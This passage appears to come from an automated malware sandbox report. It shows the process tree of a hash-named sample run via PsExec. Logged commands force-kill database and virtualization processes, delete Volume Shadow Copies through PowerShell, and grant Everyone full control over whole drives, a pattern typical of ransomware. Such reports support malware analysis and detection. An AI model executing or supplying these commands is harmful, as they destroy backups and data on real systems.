C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F3⤵
- Kills process with taskkill
PID:800
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F3⤵
- Kills process with taskkill
PID:5316
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F3⤵PID:4260
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F3⤵
- Kills process with taskkill
PID:4856
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /F3⤵
- Kills process with taskkill
PID:5824
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sql.exe /f3⤵
- Kills process with taskkill
PID:5172
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqld.exe /f3⤵PID:5820
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysql.exe /f3⤵
- Kills process with taskkill
PID:4532
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /f3⤵
- Kills process with taskkill
PID:5436
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /f3⤵
- Kills process with taskkill
PID:4264
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM vmwp.exe /f3⤵PID:5480
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }3⤵PID:3132
-
-
C:\Windows\system32\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:3372
-
-
C:\Windows\system32\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:4240
-
-
C:\Windows\system32\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:2416
-
-
-
C:\Windows\PSEXESVC.exeC:\Windows\PSEXESVC.exe1⤵PID:2912
-
C:\Windows\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"2⤵PID:800
-
-
C:\Windows\PSEXESVC.exeC:\Windows\PSEXESVC.exe1⤵PID:4280
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1232